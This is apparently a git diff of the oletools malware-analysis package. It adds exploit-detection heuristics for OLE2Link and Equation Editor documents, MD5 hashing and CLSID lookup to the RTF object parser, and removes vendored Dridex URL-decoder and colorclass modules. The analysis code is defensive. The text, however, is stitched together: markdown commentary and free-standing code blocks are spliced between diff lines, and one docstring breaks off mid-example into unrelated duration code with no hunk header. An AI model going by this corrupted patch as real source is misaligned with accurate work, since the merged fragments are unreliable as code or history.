+ return '[{0} {1} (type {2}, size {3})' \
+ .format(self.__class__.__name__,
+ self.name or '[orphan]',
+ ENTRY_TYPE2STR[self.stream_type],
+ self.size)
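The read-or-skip decision in `iter_records` above (read the payload only when `fill_data` or the record class forces it, otherwise just seek past it) can be sketched independently of OLE files; the flat 2-byte-type/4-byte-size record layout here is made up for illustration:

```python
import io
from struct import pack, unpack

def iter_flat_records(stream, size, fill_data=False):
    # hypothetical record layout for illustration: 2-byte type, 4-byte size
    while stream.tell() < size:
        rec_type, rec_size = unpack('<HL', stream.read(6))
        if fill_data:
            data = stream.read(rec_size)        # caller wants the payload
        else:
            stream.seek(rec_size, io.SEEK_CUR)  # skip payload cheaply
            data = None
        yield rec_type, rec_size, data

buf = pack('<HL', 1, 3) + b'abc' + pack('<HL', 2, 1) + b'x'
skipped = list(iter_flat_records(io.BytesIO(buf), len(buf)))
filled = list(iter_flat_records(io.BytesIO(buf), len(buf), fill_data=True))
```

Skipping keeps memory flat when only record types are of interest, which is the common case when scanning large streams.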
+
+
+class OleSummaryInformationStream(OleRecordStream):
+ """ stream for \05SummaryInformation and \05DocumentSummaryInformation
+
+ Does nothing so far. OleFileIO reads quite some info from this. For more info
+ see [MS-OSHARED] 2.3.3 and [MS-OLEPS] 2.21 and references therein.
+
+ See also: info read in oleid.py.
+ """
+ def iter_records(self, fill_data=False):
+ """ yields nothing, stops at once """
+ return
+ yield # required to make this a generator pylint: disable=unreachable
+
+
+class OleRecordBase(object):
+ """ a record found in an OleRecordStream
+
+ always has a type and a size, also pos and data
+ """
+
+ # for subclasses with a fixed type
+ TYPE = None
+
+ # (max) size of subclasses
+ MAX_SIZE = None
+ SIZE = None
+
+ def __init__(self, type, size, more_data, pos, data):
+ """ create a record; more_data is discarded """
+ if self.TYPE is not None and type != self.TYPE:
+ raise ValueError('Wrong subclass {0} for type {1}'
+ .format(self.__class__.__name__, type))
+ self.type = type
+ if self.SIZE is not None and size != self.SIZE:
+ raise ValueError('Wrong size {0} for record type {1}'
+ .format(size, type))
+ elif self.MAX_SIZE is not None and size > self.MAX_SIZE:
+ raise ValueError('Wrong size: {0} > MAX_SIZE for record type {1}'
+ .format(size, type))
+ self.size = size
+ self.pos = pos
+ self.data = data
+ self.finish_constructing(more_data)
+
+ def finish_constructing(self, more_data):
+ """ finish constructing this record
+
+ Can save more_data from OleRecordStream.read_record_head and/or parse
+ data (if it was read).
+
+ Base implementation, does nothing. To be overwritten in subclasses.
+
+ Implementations should take into account that self.data may be None.
+ Should create the same attributes, whether data is present or not. Eg::
+
+ def finish_constructing(self, more_data):
+ self.more = more_data
+ self.attr1 = None
+ self.attr2 = None
+ if self.data:
+ self.attr1, self.attr2 = struct.unpack('<HH', self.data)
+ if value > 90:
+ value /= 60.
+ unit = 'min'
+ if value > 90:
+ value /= 60.
+ unit = 'h'
+ if value > 72:
+ value /= 24.
+ unit = 'days'
+ return '{0:.1f}{1}'.format(value, unit)
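The unit-conversion cascade above (seconds to minutes past 90 s, to hours past 90 min, to days past 72 h) can be checked in isolation; this restates the same thresholds as a self-contained function:

```python
def duration_str(duration):
    """human-readable duration, mirroring the thresholds above"""
    value = float(duration)
    unit = 's'
    if value > 90:
        value /= 60.
        unit = 'min'
    if value > 90:
        value /= 60.
        unit = 'h'
    if value > 72:
        value /= 24.
        unit = 'days'
    return '{0:.1f}{1}'.format(value, unit)
```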
#=== CLASSES =================================================================
@@ -356,6 +405,20 @@ def __init__(self, data):
self.destinations = [document_destination]
self.current_destination = document_destination
+ def _report_progress(self, start_time):
+ """ report progress on parsing at regular intervals """
+ now = float(time())
+ if now == start_time or self.size == 0:
+ return # avoid zero-division
+ percent_done = 100. * self.index / self.size
+ time_per_index = (now - start_time) / float(self.index)
+ finish_estim = float(self.size - self.index) * time_per_index
+
+ log.debug('After {0} finished {1:4.1f}% of current file ({2} bytes); '
+ 'will finish in approx {3}'
+ .format(duration_str(now-start_time), percent_done,
+ self.size, duration_str(finish_estim)))
+
def parse(self):
"""
Parse the RTF data
@@ -364,8 +427,13 @@ def parse(self):
"""
# Start at beginning of data
self.index = 0
+ start_time = time()
+ last_report = start_time
# Loop until the end
while self.index < self.size:
+ if time() - last_report > 15: # report every 15s
+ self._report_progress(start_time)
+ last_report = time()
if self.data[self.index] == BRACE_OPEN:
# Found an opening brace "{": Start of a group
self._open_group()
@@ -382,9 +450,7 @@ def parse(self):
# NOTE: the full length of the control word + its optional integer parameter
# is limited by MS Word at 253 characters, so we have to run the regex
# on a cropped string:
- data_cropped = self.data[self.index:]
- if len(data_cropped)>253:
- data_cropped = data_cropped[:254]
+ data_cropped = self.data[self.index:self.index+254]
# append a space so that the regex can check the following character:
data_cropped += b' '
# m = re_control_word.match(self.data, self.index, self.index+253)
@@ -489,7 +555,7 @@ def _control_word(self, matchobject, cword, param):
# TODO: according to RTF specs v1.9.1, "Destination changes are legal only immediately after an opening brace ({)"
# (not counting the special control symbol \*, of course)
if cword in DESTINATION_CONTROL_WORDS:
- # log.debug('%r is a destination control word: starting a new destination' % cword)
+ log.debug('%r is a destination control word: starting a new destination at index %Xh' % (cword, self.index))
self._open_destination(matchobject, cword)
# call the corresponding user method for additional processing:
self.control_word(matchobject, cword, param)
@@ -511,16 +577,20 @@ def text(self, matchobject, text):
pass
def _bin(self, matchobject, param):
- binlen = int(param)
+ if param is None:
+ log.info('Detected anti-analysis trick: \\bin object without length at index %X' % self.index)
+ binlen = 0
+ else:
+ binlen = int(param)
# handle negative length
if binlen < 0:
- log.warn('Detected anti-analysis trick: \\bin object with negative length at index %X' % self.index)
+ log.info('Detected anti-analysis trick: \\bin object with negative length at index %X' % self.index)
# binlen = int(param.strip('-'))
# According to my tests, if the bin length is negative,
# it should be treated as a null length:
binlen=0
# ignore optional space after \bin
- if self.data[self.index] == ' ':
+ if ord(self.data[self.index:self.index + 1]) == ord(' '):
log.debug('\\bin: ignoring whitespace before data')
self.index += 1
log.debug('\\bin: reading %d bytes of binary data' % binlen)
@@ -571,6 +641,10 @@ def __init__(self):
self.filename = None
self.src_path = None
self.temp_path = None
+ # Additional OLE object data
+ self.clsid = None
+ self.clsid_desc = None
+
@@ -611,29 +685,39 @@ def close_destination(self, destination):
rtfobj.hexdata = hexdata
object_data = binascii.unhexlify(hexdata)
rtfobj.rawdata = object_data
+ rtfobj.rawdata_md5 = hashlib.md5(object_data).hexdigest()
# TODO: check if all hex data is extracted properly
- obj = OleObject()
+ obj = oleobj.OleObject()
try:
obj.parse(object_data)
rtfobj.format_id = obj.format_id
rtfobj.class_name = obj.class_name
rtfobj.oledata_size = obj.data_size
rtfobj.oledata = obj.data
+ rtfobj.oledata_md5 = hashlib.md5(obj.data).hexdigest()
rtfobj.is_ole = True
- if obj.class_name.lower() == 'package':
- opkg = OleNativeStream(bindata=obj.data, package=True)
+ if obj.class_name.lower() == b'package':
+ opkg = oleobj.OleNativeStream(bindata=obj.data,
+ package=True)
rtfobj.filename = opkg.filename
rtfobj.src_path = opkg.src_path
rtfobj.temp_path = opkg.temp_path
rtfobj.olepkgdata = opkg.data
+ rtfobj.olepkgdata_md5 = hashlib.md5(opkg.data).hexdigest()
rtfobj.is_package = True
+ else:
+ if olefile.isOleFile(obj.data):
+ ole = olefile.OleFileIO(obj.data)
+ rtfobj.clsid = ole.root.clsid
+ rtfobj.clsid_desc = clsid.KNOWN_CLSIDS.get(rtfobj.clsid,
+ 'unknown CLSID (please report at https://github.com/decalage2/oletools/issues)')
except:
pass
log.debug('*** Not an OLE 1.0 Object')
def bin(self, bindata):
- if self.current_destination.cword == 'objdata':
+ if self.current_destination.cword == b'objdata':
# TODO: keep track of this, because it is unusual and indicates potential obfuscation
# trick: hexlify binary data, add it to hex data
self.current_destination.data += binascii.hexlify(bindata)
@@ -645,6 +729,28 @@ def control_word(self, matchobject, cword, param):
# log.debug('- Control word "%s", param=%s, level=%d' % (cword, param, self.group_level))
pass
+ def control_symbol(self, matchobject):
+ # log.debug('control symbol %r at index %Xh' % (matchobject.group(), self.index))
+ symbol = matchobject.group()[1:2]
+ if symbol == b"'":
+ # read the two hex digits following "\'" - which can be any characters, not just hex digits
+ # (because within an objdata destination, they are simply ignored)
+ hexdigits = self.data[self.index+2:self.index+4]
+ # print(hexdigits)
+ # move the index two bytes forward
+ self.index += 2
+ if self.current_destination.cword == b'objdata':
+ # Here's the tricky part: there is a bug in the MS Word RTF parser at least
+ # until Word 2016, that removes the last hex digit before the \'hh control
+ # symbol, ONLY IF the number of hex digits read so far is odd.
+ # So to emulate that bug, we have to clean the data read so far by keeping
+ # only the hex digits:
+ # Filter out any non-hex character:
+ self.current_destination.data = re.sub(b'[^a-fA-F0-9]', b'', self.current_destination.data)
+ if len(self.current_destination.data) & 1 == 1:
+ # If the number of hex digits is odd, remove the last one:
+ self.current_destination.data = self.current_destination.data[:-1]
+
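The Word parser bug emulated above (before a `\'hh` control symbol, drop the last hex digit if the count of hex digits read so far is odd) boils down to the two steps sketched here on their own:

```python
import re

def clean_objdata_hex(data_so_far):
    # step 1: keep only hex digits, as Word does inside an objdata destination
    cleaned = re.sub(b'[^a-fA-F0-9]', b'', data_so_far)
    # step 2: with an odd number of hex digits, Word drops the last one
    if len(cleaned) & 1 == 1:
        cleaned = cleaned[:-1]
    return cleaned
```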
#=== FUNCTIONS ===============================================================
@@ -668,7 +774,50 @@ def rtf_iter_objects(filename, min_size=32):
yield obj.start, orig_len, obj.rawdata
+def is_rtf(arg, treat_str_as_data=False):
+ """ determine whether given file / stream / array represents an rtf file
+
+ arg can be either a file name, a byte stream (located at start), a
+ list/tuple or an iterable that contains bytes.
+ For a str argument it is not clear whether it is a file name or the data
+ read from it (at least for py2-str, which is bytes); the argument
+ treat_str_as_data clarifies this.
+ """
+ magic_len = len(RTF_MAGIC)
+ if isinstance(arg, UNICODE_TYPE):
+ with open(arg, 'rb') as reader:
+ return reader.read(len(RTF_MAGIC)) == RTF_MAGIC
+ if isinstance(arg, bytes) and not isinstance(arg, str): # only in PY3
+ return arg[:magic_len] == RTF_MAGIC
+ if isinstance(arg, bytearray):
+ return arg[:magic_len] == RTF_MAGIC
+ if isinstance(arg, str): # could be bytes, but we assume file name
+ if treat_str_as_data:
+ try:
+ return arg[:magic_len].encode('ascii', errors='strict')\
+ == RTF_MAGIC
+ except UnicodeError:
+ return False
+ else:
+ with open(arg, 'rb') as reader:
+ return reader.read(len(RTF_MAGIC)) == RTF_MAGIC
+ if hasattr(arg, 'read'): # a stream (i.e. file-like object)
+ return arg.read(len(RTF_MAGIC)) == RTF_MAGIC
+ if isinstance(arg, (list, tuple)):
+ iter_arg = iter(arg)
+ else:
+ iter_arg = arg
+
+ # check iterable
+ for magic_byte in zip(RTF_MAGIC):
+ try:
+ if next(iter_arg) not in magic_byte:
+ return False
+ except StopIteration:
+ return False
+
+ return True # checked the complete magic without returning False --> match
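The simplest branch of `is_rtf` above is the bytes case: compare the leading bytes against the RTF magic. A minimal sketch; the constant's value is an assumption here, chosen as the truncated `{\rt` since the module deliberately tolerates obfuscated files that shorten the `\rtf` keyword:

```python
RTF_MAGIC = b'{\\rt'  # assumed value; deliberately shorter than '{\\rtf'

def is_rtf_bytes(data):
    """bytes/bytearray branch of the check above"""
    return bytes(data[:len(RTF_MAGIC)]) == RTF_MAGIC
```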
def sanitize_filename(filename, replacement='_', max_length=200):
@@ -712,15 +861,14 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
print('='*79)
print('File: %r - size: %d bytes' % (filename, len(data)))
tstream = tablestream.TableStream(
- column_width=(3, 10, 31, 31),
- header_row=('id', 'index', 'OLE Object', 'OLE Package'),
+ column_width=(3, 10, 63),
+ header_row=('id', 'index', 'OLE Object'),
style=tablestream.TableStyleSlim
)
rtfp = RtfObjParser(data)
rtfp.parse()
for rtfobj in rtfp.objects:
ole_color = None
- pkg_color = None
if rtfobj.is_ole:
ole_column = 'format_id: %d ' % rtfobj.format_id
if rtfobj.format_id == oleobj.OleObject.TYPE_EMBEDDED:
@@ -736,33 +884,66 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
else:
ole_column += 'data size: %d' % rtfobj.oledata_size
if rtfobj.is_package:
- pkg_column = 'Filename: %r\n' % rtfobj.filename
- pkg_column += 'Source path: %r\n' % rtfobj.src_path
- pkg_column += 'Temp path = %r' % rtfobj.temp_path
- pkg_color = 'yellow'
+ ole_column += '\nOLE Package object:'
+ ole_column += '\nFilename: %r' % rtfobj.filename
+ ole_column += '\nSource path: %r' % rtfobj.src_path
+                ole_column += '\nTemp path: %r' % rtfobj.temp_path
+                ole_column += '\nMD5: %s' % rtfobj.olepkgdata_md5
+ ole_color = 'yellow'
# check if the file extension is executable:
- _, ext = os.path.splitext(rtfobj.filename)
- log.debug('File extension: %r' % ext)
- if re_executable_extensions.match(ext):
- pkg_color = 'red'
- pkg_column += '\nEXECUTABLE FILE'
+
+ _, temp_ext = os.path.splitext(rtfobj.temp_path)
+ log.debug('Temp path extension: %r' % temp_ext)
+ _, file_ext = os.path.splitext(rtfobj.filename)
+ log.debug('File extension: %r' % file_ext)
+
+ if temp_ext != file_ext:
+ ole_column += "\nMODIFIED FILE EXTENSION"
+
+ if re_executable_extensions.match(temp_ext) or re_executable_extensions.match(file_ext):
+ ole_color = 'red'
+ ole_column += '\nEXECUTABLE FILE'
else:
- pkg_column = 'Not an OLE Package'
+            ole_column += '\nMD5: %s' % rtfobj.oledata_md5
+ if rtfobj.clsid is not None:
+ ole_column += '\nCLSID: %s' % rtfobj.clsid
+ ole_column += '\n%s' % rtfobj.clsid_desc
+ if 'CVE' in rtfobj.clsid_desc:
+ ole_color = 'red'
# Detect OLE2Link exploit
# http://www.kb.cert.org/vuls/id/921560
- if rtfobj.class_name == 'OLE2Link':
+ if rtfobj.class_name == b'OLE2Link':
+ ole_color = 'red'
+ ole_column += '\nPossibly an exploit for the OLE2Link vulnerability (VU#921560, CVE-2017-0199)\n'
+ # https://bitbucket.org/snippets/Alexander_Hanel/7Adpp
+                found_list = re.findall(br'[a-fA-F0-9\x0D\x0A]{128,}', data)
+                urls = []
+                for item in found_list:
+                    try:
+                        # strip CRLF line breaks, then decode the hex string
+                        # (the py2-only "hex" codec does not exist in py3;
+                        # bytearray.fromhex works on both py2.7 and py3)
+                        clean = item.replace(b'\x0D\x0A', b'').decode('ascii')
+                        temp = bytes(bytearray.fromhex(clean))
+                    except ValueError:
+                        # odd number of digits or invalid hex: skip this run
+                        continue
+                    # printable ASCII characters encoded as UTF-16LE
+                    pat = re.compile(br'(?:[\x20-\x7E]\x00){3,}')
+                    words = [w.decode('utf-16le') for w in pat.findall(temp)]
+ for w in words:
+ if "http" in w:
+ urls.append(w)
+ urls = sorted(set(urls))
+ if urls:
+ ole_column += 'URL extracted: ' + ', '.join(urls)
+ # Detect Equation Editor exploit
+ # https://www.kb.cert.org/vuls/id/421280/
+ elif rtfobj.class_name.lower().startswith(b'equation.3'):
ole_color = 'red'
- ole_column += '\nPossibly an exploit for the OLE2Link vulnerability (VU#921560, CVE-2017-0199)'
+ ole_column += '\nPossibly an exploit for the Equation Editor vulnerability (VU#421280, CVE-2017-11882)'
else:
- pkg_column = ''
ole_column = 'Not a well-formed OLE object'
tstream.write_row((
rtfp.objects.index(rtfobj),
# filename,
'%08Xh' % rtfobj.start,
- ole_column,
- pkg_column
- ), colors=(None, None, ole_color, pkg_color)
+ ole_column
+ ), colors=(None, None, ole_color)
)
tstream.write_sep()
if save_object:
@@ -788,6 +969,7 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
else:
fname = '%s_object_%08X.noname' % (fname_prefix, rtfobj.start)
print(' saving to file %s' % fname)
+ print(' md5 %s' % rtfobj.olepkgdata_md5)
open(fname, 'wb').write(rtfobj.olepkgdata)
# When format_id=TYPE_LINKED, oledata_size=None
elif rtfobj.is_ole and rtfobj.oledata_size is not None:
@@ -805,11 +987,13 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
ext = 'bin'
fname = '%s_object_%08X.%s' % (fname_prefix, rtfobj.start, ext)
print(' saving to file %s' % fname)
+ print(' md5 %s' % rtfobj.oledata_md5)
open(fname, 'wb').write(rtfobj.oledata)
else:
print('Saving raw data in object #%d:' % i)
fname = '%s_object_%08X.raw' % (fname_prefix, rtfobj.start)
print(' saving object to file %s' % fname)
+ print(' md5 %s' % rtfobj.rawdata_md5)
open(fname, 'wb').write(rtfobj.rawdata)
@@ -817,7 +1001,9 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
def main():
# print banner with version
- print ('rtfobj %s - http://decalage.info/python/oletools' % __version__)
+ python_version = '%d.%d.%d' % sys.version_info[0:3]
+ print ('rtfobj %s on Python %s - http://decalage.info/python/oletools' %
+ (__version__, python_version))
print ('THIS IS WORK IN PROGRESS - Check updates regularly!')
print ('Please report any issue at https://github.com/decalage2/oletools/issues')
print ('')
@@ -891,4 +1077,3 @@ def main():
main()
# This code was developed while listening to The Mary Onettes "Lost"
-
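The OLE2Link URL-extraction heuristic added to `process_file` above (find long hex runs, decode them, then scan for printable UTF-16LE strings containing "http") can be sketched in isolation; `extract_utf16_urls` is an illustrative helper, not part of rtfobj's API:

```python
import re

def extract_utf16_urls(data):
    """Decode long hex runs in `data` and return any printable UTF-16LE
    strings inside them that contain 'http'."""
    urls = []
    # runs of at least 128 hex digits, possibly interrupted by CRLF
    for item in re.findall(br'[a-fA-F0-9\x0D\x0A]{128,}', data):
        try:
            blob = bytes.fromhex(item.replace(b'\x0D\x0A', b'').decode('ascii'))
        except ValueError:  # odd number of digits: not decodable hex
            continue
        # printable ASCII encoded as UTF-16LE: (char, NUL) pairs, 3+ in a row
        for word in re.findall(br'(?:[\x20-\x7E]\x00){3,}', blob):
            text = word.decode('utf-16le')
            if 'http' in text:
                urls.append(text)
    return sorted(set(urls))
```

Deduplicating with `sorted(set(...))` keeps the report stable across runs, matching what the patched code does.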
diff --git a/oletools/thirdparty/DridexUrlDecoder/DridexUrlDecoder.py b/oletools/thirdparty/DridexUrlDecoder/DridexUrlDecoder.py
deleted file mode 100644
index 4c083b3e..00000000
--- a/oletools/thirdparty/DridexUrlDecoder/DridexUrlDecoder.py
+++ /dev/null
@@ -1,42 +0,0 @@
-# Written by @JamesHabben
-# https://github.com/JamesHabben/MalwareStuff
-
-# 2015-01-27 Slight modifications from Philippe Lagadec (PL) to use it from olevba
-
-import sys
-
-def DridexUrlDecode (inputText) :
- work = inputText[4:-4]
- strKeyEnc = StripCharsWithZero(work[(len(work) / 2) - 2: (len(work) / 2)])
- strKeySize = StripCharsWithZero(work[(len(work) / 2): (len(work) / 2) + 2])
- nCharSize = strKeySize - strKeyEnc
- work = work[:(len(work) / 2) - 2] + work[(len(work) / 2) + 2:]
- strKeyEnc2 = StripChars(work[(len(work) / 2) - (nCharSize/2): (len(work) / 2) + (nCharSize/2)])
- work = work[:(len(work) / 2) - (nCharSize/2)] + work[(len(work) / 2) + (nCharSize/2):]
- work_split = [work[i:i+nCharSize] for i in range(0, len(work), nCharSize)]
- decoded = ''
- for group in work_split:
- # sys.stdout.write(chr(StripChars(group)/strKeyEnc2))
- decoded += chr(StripChars(group)/strKeyEnc2)
- return decoded
-
-def StripChars (input) :
- result = ''
- for c in input :
- if c.isdigit() :
- result += c
- return int(result)
-
-def StripCharsWithZero (input) :
- result = ''
- for c in input :
- if c.isdigit() :
- result += c
- else:
- result += '0'
- return int(result)
-
-
-# DridexUrlDecode("C3iY1epSRGe6q8g15xStVesdG717MAlg2H4hmV1vkL6Glnf0cknj")
-# DridexUrlDecode("HLIY3Nf3z2k8jD37h1n2OM3N712DGQ3c5M841RZ8C5e6P1C50C4ym1oF504WyV182p4mJ16cK9Z61l47h2dU1rVB5V681sFY728i16H3E2Qm1fn47y2cgAo156j8T1s600hukKO1568X1xE4Z7d2q17jvcwgk816Yz32o9Q216Mpr0B01vcwg856a17b9j2zAmWf1536B1t7d92rI1FZ5E36Pu1jl504Z34tm2R43i55Lg2F3eLE3T28lLX1D504348Goe8Gbdp37w443ADy36X0h14g7Wb2G3u584kEG332Ut8ws3wO584pzSTf")
-# DridexUrlDecode("YNPH1W47E211z3P6142cM4115K2J1696CURf1712N1OCJwc0w6Z16840Z1r600W16Z3273k6SR16Bf161Q92a016Vr16V1pc")
diff --git a/oletools/thirdparty/DridexUrlDecoder/LICENSE.txt b/oletools/thirdparty/DridexUrlDecoder/LICENSE.txt
deleted file mode 100644
index f29a1c34..00000000
--- a/oletools/thirdparty/DridexUrlDecoder/LICENSE.txt
+++ /dev/null
@@ -1,3 +0,0 @@
-DridexUrlDecoder.py is published by James Habben (@JamesHabben)
-on https://github.com/JamesHabben/MalwareStuff
-without explicit license.
\ No newline at end of file
diff --git a/oletools/thirdparty/colorclass/LICENSE.txt b/oletools/thirdparty/colorclass/LICENSE.txt
deleted file mode 100644
index d42eea76..00000000
--- a/oletools/thirdparty/colorclass/LICENSE.txt
+++ /dev/null
@@ -1,21 +0,0 @@
-The MIT License (MIT)
-
-Copyright (c) 2014 Robpol86
-
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
-
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.
diff --git a/oletools/thirdparty/colorclass/__init__.py b/oletools/thirdparty/colorclass/__init__.py
deleted file mode 100644
index cae4016b..00000000
--- a/oletools/thirdparty/colorclass/__init__.py
+++ /dev/null
@@ -1,38 +0,0 @@
-"""Colorful worry-free console applications for Linux, Mac OS X, and Windows.
-
-Supported natively on Linux and Mac OSX (Just Works), and on Windows it works the same if Windows.enable() is called.
-
-Gives you expected and sane results from methods like len() and .capitalize().
-
-https://github.com/Robpol86/colorclass
-https://pypi.python.org/pypi/colorclass
-"""
-
-from colorclass.codes import list_tags # noqa
-from colorclass.color import Color # noqa
-from colorclass.toggles import disable_all_colors # noqa
-from colorclass.toggles import disable_if_no_tty # noqa
-from colorclass.toggles import enable_all_colors # noqa
-from colorclass.toggles import is_enabled # noqa
-from colorclass.toggles import is_light # noqa
-from colorclass.toggles import set_dark_background # noqa
-from colorclass.toggles import set_light_background # noqa
-from colorclass.windows import Windows # noqa
-
-
-__all__ = (
- 'Color',
- 'disable_all_colors',
- 'enable_all_colors',
- 'is_enabled',
- 'is_light',
- 'list_tags',
- 'set_dark_background',
- 'set_light_background',
- 'Windows',
-)
-
-
-__author__ = '@Robpol86'
-__license__ = 'MIT'
-__version__ = '2.2.0'
diff --git a/oletools/thirdparty/colorclass/__main__.py b/oletools/thirdparty/colorclass/__main__.py
deleted file mode 100644
index d8f3f001..00000000
--- a/oletools/thirdparty/colorclass/__main__.py
+++ /dev/null
@@ -1,33 +0,0 @@
-"""Called by "python -m". Allows package to be used as a script.
-
-Example usage:
-echo "{red}Red{/red}" |python -m colorclass
-"""
-
-from __future__ import print_function
-
-import fileinput
-import os
-
-from colorclass.color import Color
-from colorclass.toggles import disable_all_colors
-from colorclass.toggles import enable_all_colors
-from colorclass.toggles import set_dark_background
-from colorclass.toggles import set_light_background
-from colorclass.windows import Windows
-
-TRUTHY = ('true', '1', 'yes', 'on')
-
-
-if __name__ == '__main__':
- if os.environ.get('COLOR_ENABLE', '').lower() in TRUTHY:
- enable_all_colors()
- elif os.environ.get('COLOR_DISABLE', '').lower() in TRUTHY:
- disable_all_colors()
- if os.environ.get('COLOR_LIGHT', '').lower() in TRUTHY:
- set_light_background()
- elif os.environ.get('COLOR_DARK', '').lower() in TRUTHY:
- set_dark_background()
- Windows.enable()
- for LINE in fileinput.input():
- print(Color(LINE))
diff --git a/oletools/thirdparty/colorclass/codes.py b/oletools/thirdparty/colorclass/codes.py
deleted file mode 100644
index b0ecb03a..00000000
--- a/oletools/thirdparty/colorclass/codes.py
+++ /dev/null
@@ -1,229 +0,0 @@
-"""Handles mapping between color names and ANSI codes and determining auto color codes."""
-
-import sys
-from collections import Mapping
-
-BASE_CODES = {
- '/all': 0, 'b': 1, 'f': 2, 'i': 3, 'u': 4, 'flash': 5, 'outline': 6, 'negative': 7, 'invis': 8, 'strike': 9,
- '/b': 22, '/f': 22, '/i': 23, '/u': 24, '/flash': 25, '/outline': 26, '/negative': 27, '/invis': 28,
- '/strike': 29, '/fg': 39, '/bg': 49,
-
- 'black': 30, 'red': 31, 'green': 32, 'yellow': 33, 'blue': 34, 'magenta': 35, 'cyan': 36, 'white': 37,
-
- 'bgblack': 40, 'bgred': 41, 'bggreen': 42, 'bgyellow': 43, 'bgblue': 44, 'bgmagenta': 45, 'bgcyan': 46,
- 'bgwhite': 47,
-
- 'hiblack': 90, 'hired': 91, 'higreen': 92, 'hiyellow': 93, 'hiblue': 94, 'himagenta': 95, 'hicyan': 96,
- 'hiwhite': 97,
-
- 'hibgblack': 100, 'hibgred': 101, 'hibggreen': 102, 'hibgyellow': 103, 'hibgblue': 104, 'hibgmagenta': 105,
- 'hibgcyan': 106, 'hibgwhite': 107,
-
- 'autored': None, 'autoblack': None, 'automagenta': None, 'autowhite': None, 'autoblue': None, 'autoyellow': None,
- 'autogreen': None, 'autocyan': None,
-
- 'autobgred': None, 'autobgblack': None, 'autobgmagenta': None, 'autobgwhite': None, 'autobgblue': None,
- 'autobgyellow': None, 'autobggreen': None, 'autobgcyan': None,
-
- '/black': 39, '/red': 39, '/green': 39, '/yellow': 39, '/blue': 39, '/magenta': 39, '/cyan': 39, '/white': 39,
- '/hiblack': 39, '/hired': 39, '/higreen': 39, '/hiyellow': 39, '/hiblue': 39, '/himagenta': 39, '/hicyan': 39,
- '/hiwhite': 39,
-
- '/bgblack': 49, '/bgred': 49, '/bggreen': 49, '/bgyellow': 49, '/bgblue': 49, '/bgmagenta': 49, '/bgcyan': 49,
- '/bgwhite': 49, '/hibgblack': 49, '/hibgred': 49, '/hibggreen': 49, '/hibgyellow': 49, '/hibgblue': 49,
- '/hibgmagenta': 49, '/hibgcyan': 49, '/hibgwhite': 49,
-
- '/autored': 39, '/autoblack': 39, '/automagenta': 39, '/autowhite': 39, '/autoblue': 39, '/autoyellow': 39,
- '/autogreen': 39, '/autocyan': 39,
-
- '/autobgred': 49, '/autobgblack': 49, '/autobgmagenta': 49, '/autobgwhite': 49, '/autobgblue': 49,
- '/autobgyellow': 49, '/autobggreen': 49, '/autobgcyan': 49,
-}
-
-
-class ANSICodeMapping(Mapping):
- """Read-only dictionary, resolves closing tags and automatic colors. Iterates only used color tags.
-
- :cvar bool DISABLE_COLORS: Disable colors (strip color codes).
- :cvar bool LIGHT_BACKGROUND: Use low intensity color codes.
- """
-
- DISABLE_COLORS = False
- LIGHT_BACKGROUND = False
-
- def __init__(self, value_markup):
- """Constructor.
-
- :param str value_markup: String with {color} tags.
- """
- self.whitelist = [k for k in BASE_CODES if '{' + k + '}' in value_markup]
-
- def __getitem__(self, item):
- """Return value for key or None if colors are disabled.
-
- :param str item: Key.
-
- :return: Color code integer.
- :rtype: int
- """
- if item not in self.whitelist:
- raise KeyError(item)
- if self.DISABLE_COLORS:
- return None
- return getattr(self, item, BASE_CODES[item])
-
- def __iter__(self):
- """Iterate dictionary."""
- return iter(self.whitelist)
-
- def __len__(self):
- """Dictionary length."""
- return len(self.whitelist)
-
- @classmethod
- def disable_all_colors(cls):
- """Disable all colors. Strips any color tags or codes."""
- cls.DISABLE_COLORS = True
-
- @classmethod
- def enable_all_colors(cls):
- """Enable all colors. Strips any color tags or codes."""
- cls.DISABLE_COLORS = False
-
- @classmethod
- def disable_if_no_tty(cls):
- """Disable all colors only if there is no TTY available.
-
- :return: True if colors are disabled, False if stderr or stdout is a TTY.
- :rtype: bool
- """
- if sys.stdout.isatty() or sys.stderr.isatty():
- return False
- cls.disable_all_colors()
- return True
-
- @classmethod
- def set_dark_background(cls):
- """Choose dark colors for all 'auto'-prefixed codes for readability on light backgrounds."""
- cls.LIGHT_BACKGROUND = False
-
- @classmethod
- def set_light_background(cls):
- """Choose dark colors for all 'auto'-prefixed codes for readability on light backgrounds."""
- cls.LIGHT_BACKGROUND = True
-
- @property
- def autoblack(self):
- """Return automatic black foreground color depending on background color."""
- return BASE_CODES['black' if ANSICodeMapping.LIGHT_BACKGROUND else 'hiblack']
-
- @property
- def autored(self):
- """Return automatic red foreground color depending on background color."""
- return BASE_CODES['red' if ANSICodeMapping.LIGHT_BACKGROUND else 'hired']
-
- @property
- def autogreen(self):
- """Return automatic green foreground color depending on background color."""
- return BASE_CODES['green' if ANSICodeMapping.LIGHT_BACKGROUND else 'higreen']
-
- @property
- def autoyellow(self):
- """Return automatic yellow foreground color depending on background color."""
- return BASE_CODES['yellow' if ANSICodeMapping.LIGHT_BACKGROUND else 'hiyellow']
-
- @property
- def autoblue(self):
- """Return automatic blue foreground color depending on background color."""
- return BASE_CODES['blue' if ANSICodeMapping.LIGHT_BACKGROUND else 'hiblue']
-
- @property
- def automagenta(self):
- """Return automatic magenta foreground color depending on background color."""
